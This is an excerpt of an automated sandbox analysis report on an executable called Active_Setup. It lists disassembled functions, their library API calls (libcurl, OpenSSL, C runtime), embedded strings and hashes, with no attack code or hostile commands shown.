                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf$curl_mvsnprintf
                                                                                                                                                  • String ID: %c%c%c%c$%c%c%c=$%c%c==$Basic
                                                                                                                                                  • API String ID: 405648482-3685042812
                                                                                                                                                  • Opcode ID: 6601b2fed64c7f7670b58d24fd70f44bdada26e4eaefc7effc6da1dbe3617826
                                                                                                                                                  • Instruction ID: c792a9ca6f952b42ea03c32a5e90919730ad301e9423761e186c90a235782211
                                                                                                                                                  • Opcode Fuzzy Hash: 6601b2fed64c7f7670b58d24fd70f44bdada26e4eaefc7effc6da1dbe3617826
                                                                                                                                                  • Instruction Fuzzy Hash: 21418C654083904FD302CB74A8A57B77BE59B8A315F1C059EE8D8C7703E3A8D60AA761
                                                                                                                                                  Function 0104CFF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _fputs.LIBCMT ref: 0104D026
                                                                                                                                                  • _fputs.LIBCMT ref: 0104D03F
                                                                                                                                                    • Part of subcall function 01082E9D: __fileno.LIBCMT ref: 01082EEC
                                                                                                                                                    • Part of subcall function 01082E9D: _strlen.LIBCMT ref: 01082F4D
                                                                                                                                                    • Part of subcall function 01082E9D: __lock_file.LIBCMT ref: 01082F56
                                                                                                                                                    • Part of subcall function 01082E9D: __stbuf.LIBCMT ref: 01082F61
                                                                                                                                                    • Part of subcall function 01082E9D: __ftbuf.LIBCMT ref: 01082F7B
                                                                                                                                                    • Part of subcall function 0108352C: _flsall.LIBCMT ref: 01083540
                                                                                                                                                  • _fprintf.LIBCMT ref: 0104D06C
                                                                                                                                                  • _fprintf.LIBCMT ref: 0104D0EA
                                                                                                                                                  • _fputs.LIBCMT ref: 0104D11B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fputs$_fprintf$__fileno__ftbuf__lock_file__stbuf_flsall_strlen
                                                                                                                                                  • String ID: Verify failure$Verifying - %s
                                                                                                                                                  • API String ID: 2929492229-2434124770
                                                                                                                                                  • Opcode ID: 58617c338bca47b746a70932cc8def4158000a3e8f71601a57c6283f54051e98
                                                                                                                                                  • Instruction ID: 5a3d8ce050eb2d5c67ded0df2f7e24ffa1cef187743e773b4d3e4450236a7368
                                                                                                                                                  • Opcode Fuzzy Hash: 58617c338bca47b746a70932cc8def4158000a3e8f71601a57c6283f54051e98
                                                                                                                                                  • Instruction Fuzzy Hash: B03106F3A0410237D61176B87C8AEDB339E9FB1210F080475FCD8DB246EA3AD55947A2
                                                                                                                                                  Function 00FB56F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00FB571C
                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00FB5742
                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00FB57CA
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00FB57D9
                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00FB57EE
                                                                                                                                                  • std::locale::facet::facet_Register.LIBCPMT ref: 00FB5809
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
                                                                                                                                                  • String ID: bad cast
                                                                                                                                                  • API String ID: 2820251361-3145022300
                                                                                                                                                  • Opcode ID: 87dc7bbe2d7ad8f737776313bd5079f6987ed960ac87136801f72c4a08475719
                                                                                                                                                  • Instruction ID: ca401093a4a5d698eb19b608c632241ad49cca3445f8996aca2436d9cd41242e
                                                                                                                                                  • Opcode Fuzzy Hash: 87dc7bbe2d7ad8f737776313bd5079f6987ed960ac87136801f72c4a08475719
                                                                                                                                                  • Instruction Fuzzy Hash: DA319F35604741DFCB24EF15D891BAA77A0BB54B30F544A1DF8E2972E0DB38A844DF92
                                                                                                                                                  Function 00FC2C70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 82COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_strequal.ACTIVE_SETUP(0109FD68,00000000,?,?,?,00000000,00FC2EA3,00FB85F1,?,00000001), ref: 00FC2C91
                                                                                                                                                  • _fputs.LIBCMT ref: 00FC2CC8
                                                                                                                                                  • curl_mfprintf.ACTIVE_SETUP(00000000,%s,00000000,?,?,?,?,00000000,00FC2EA3,00FB85F1,?,00000001), ref: 00FC2CEA
                                                                                                                                                  • curl_mfprintf.ACTIVE_SETUP(00000000,## Fatal libcurl error,?,?,?,?,00000000,00FC2EA3,00FB85F1,?,00000001), ref: 00FC2D19
                                                                                                                                                  Strings
                                                                                                                                                  • # Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00FC2CC3
                                                                                                                                                  • %s, xrefs: 00FC2CE4
                                                                                                                                                  • ## Fatal libcurl error, xrefs: 00FC2D13
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_mfprintf$_fputscurl_strequal
                                                                                                                                                  • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s
                                                                                                                                                  • API String ID: 2678714247-4016238800
                                                                                                                                                  • Opcode ID: 42630454a63fd9df8c8ceb7d23c7d8bce3c9bb9022bfd0c8cce7eeba282da6ac
                                                                                                                                                  • Instruction ID: 06781c6f5668c3e709025fe495736ea0882ef3face3f6fe1087683403e578e78
                                                                                                                                                  • Opcode Fuzzy Hash: 42630454a63fd9df8c8ceb7d23c7d8bce3c9bb9022bfd0c8cce7eeba282da6ac
                                                                                                                                                  • Instruction Fuzzy Hash: 15110473E4171B23CA2035A97E82F6B325DCFB0B31F09042EEC85E6202E995DD51A1A2
                                                                                                                                                  Function 00FB4780 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00FB47CD
                                                                                                                                                    • Part of subcall function 01088E71: RaiseException.KERNEL32(?,?,0107FD3A,?,?,?,?,?,0107FD3A,?,010E5BF8,010F4164), ref: 01088EB3
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00FB4810
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00FB4853
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00FB4891
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                  • API String ID: 3476068407-1866435925
                                                                                                                                                  • Opcode ID: 23df74c34f1e5e27ef4e3d3c78acb6b0bd0c0bf742853a829c4ed2ee23874fb3
                                                                                                                                                  • Instruction ID: 1efd039c56fb7191e4d0579a8dd80e218a8f2909e7d11f6ce8408e74263ac3e2
                                                                                                                                                  • Opcode Fuzzy Hash: 23df74c34f1e5e27ef4e3d3c78acb6b0bd0c0bf742853a829c4ed2ee23874fb3
                                                                                                                                                  • Instruction Fuzzy Hash: 0921F371158340AFC314EB62CC56FDAB7E4AF84714F408A0DF5E996192EB78E108CF22
                                                                                                                                                  Function 0109B50B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 0109B512
                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0109B51C
                                                                                                                                                    • Part of subcall function 00FB4270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB427F
                                                                                                                                                  • codecvt.LIBCPMT ref: 0109B556
                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0109B56A
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0109B578
                                                                                                                                                  • std::locale::facet::facet_Register.LIBCPMT ref: 0109B58E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LockitLockit::_std::_$Exception@8H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::facet_
                                                                                                                                                  • String ID: bad cast
                                                                                                                                                  • API String ID: 1373396938-3145022300
                                                                                                                                                  • Opcode ID: b9e61df8ffef417f345c1bcd186e4372e3cb05fb1f9aee73e1a227f7ba5e22ec
                                                                                                                                                  • Instruction ID: 052b18a7dfd62ca640cee2b77a006ba8154b4c17b819b7dc32fddf6fd857a1db
                                                                                                                                                  • Opcode Fuzzy Hash: b9e61df8ffef417f345c1bcd186e4372e3cb05fb1f9aee73e1a227f7ba5e22ec
                                                                                                                                                  • Instruction Fuzzy Hash: 2401803190021A9BCF15FBA4E862EFE7675AF94730F544508E5D1AB1D0DF38AA01AB94
                                                                                                                                                  Function 010804EE Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 010804F4
                                                                                                                                                    • Part of subcall function 0108771B: TlsGetValue.KERNEL32(0107FCF5,010878A7,?,0107FCF5,?), ref: 01087724
                                                                                                                                                    • Part of subcall function 0108771B: __decode_pointer.LIBCMT ref: 01087736
                                                                                                                                                    • Part of subcall function 0108771B: TlsSetValue.KERNEL32(00000000,0107FCF5,?), ref: 01087745
                                                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 010804FF
                                                                                                                                                    • Part of subcall function 010876FB: TlsGetValue.KERNEL32(?,?,01080504,00000000), ref: 01087709
                                                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 01080512
                                                                                                                                                    • Part of subcall function 0108774F: __decode_pointer.LIBCMT ref: 01087760
                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 0108051B
                                                                                                                                                  • ExitThread.KERNEL32 ref: 01080522
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 01080528
                                                                                                                                                  • __freefls@4.LIBCMT ref: 01080548
                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0108055B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1925773019-0
                                                                                                                                                  • Opcode ID: 1690b89a93eaf11794b15aa1713ad85fe75633bc463ce77c0178529d819b08fb
                                                                                                                                                  • Instruction ID: 98ddc1d64aa93bb09fe2e438996ea1694a23bc447f51ba6d2daada4feca98320
                                                                                                                                                  • Opcode Fuzzy Hash: 1690b89a93eaf11794b15aa1713ad85fe75633bc463ce77c0178529d819b08fb
                                                                                                                                                  • Instruction Fuzzy Hash: 2B01D6B0508602ABD718BF74D80898E3FD8BF54204B248454F8C8C721DEF39D486CBB0
                                                                                                                                                  Function 01052CC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncpy
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c
                                                                                                                                                  • API String ID: 2961919466-1566349280
                                                                                                                                                  • Opcode ID: 380ecd304013a451e86f6ef84de51e10d2c966d3e5c33b5638edc940041be848
                                                                                                                                                  • Instruction ID: 0c53faea66b947a66da830554633655a7e99e224bc3709d5ce48471208c07bcc
                                                                                                                                                  • Opcode Fuzzy Hash: 380ecd304013a451e86f6ef84de51e10d2c966d3e5c33b5638edc940041be848
                                                                                                                                                  • Instruction Fuzzy Hash: C871D370604B01DFD7B0DE2CC881A67B7E1BF84700F188A6DE9CA8B645D774E449CBA1
                                                                                                                                                  Function 00FC5550 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000020,%ld,FFFFFFFF), ref: 00FC5644
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000020,.%ld), ref: 00FC5660
                                                                                                                                                  • _sprintf.LIBCMT ref: 00FC56C5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf$_sprintf
                                                                                                                                                  • String ID: %ld$-$.%ld
                                                                                                                                                  • API String ID: 2394090773-3983876956
                                                                                                                                                  • Opcode ID: d4ffd195dd6ed7d555dc3c525b96679e2d26c8373c4d6ff067135bbd689bdc39
                                                                                                                                                  • Instruction ID: e7dd769cd1e19b9361159f0e58ff8cc992b5e03e45426938dd86205cfaba4faf
                                                                                                                                                  • Opcode Fuzzy Hash: d4ffd195dd6ed7d555dc3c525b96679e2d26c8373c4d6ff067135bbd689bdc39
                                                                                                                                                  • Instruction Fuzzy Hash: 5A51EA718087C68FD331CF28C946BABB7E1AF84714F640D1CD8C953281E775A989D752
                                                                                                                                                  Function 00FCC000 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00FD4510: __localtime64.LIBCMT ref: 00FD4515
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00003FFF,%s, %02d %s %4d %02d:%02d:%02d GMT,?,?,?,?,?,?,?), ref: 00FCC096
                                                                                                                                                    • Part of subcall function 00FC1180: curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
                                                                                                                                                    • Part of subcall function 00FC1180: curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf$__localtime64curl_mvsnprintf
                                                                                                                                                  • String ID: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since: %s$If-Unmodified-Since: %s$Invalid TIMEVALUE$Last-Modified: %s
                                                                                                                                                  • API String ID: 743165356-2575227759
                                                                                                                                                  • Opcode ID: 0034436d255c9cdb9d1460b6b4b70cd7f37d21b2d5dbf551ef0845ee6f1f3885
                                                                                                                                                  • Instruction ID: 12e88d3d9c611163990d384cf4d1379de79c291550a9e2f8eb2720170747f46d
                                                                                                                                                  • Opcode Fuzzy Hash: 0034436d255c9cdb9d1460b6b4b70cd7f37d21b2d5dbf551ef0845ee6f1f3885
                                                                                                                                                  • Instruction Fuzzy Hash: 0C212976B44201ABC204D669EC83E5B73E8EBC8314F48493CFD8E93201E279F94997E1
                                                                                                                                                  Function 00FCAC00 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00004001,%s:%s,?,?,?,Basic,00000000), ref: 00FCAC58
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FCACCD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
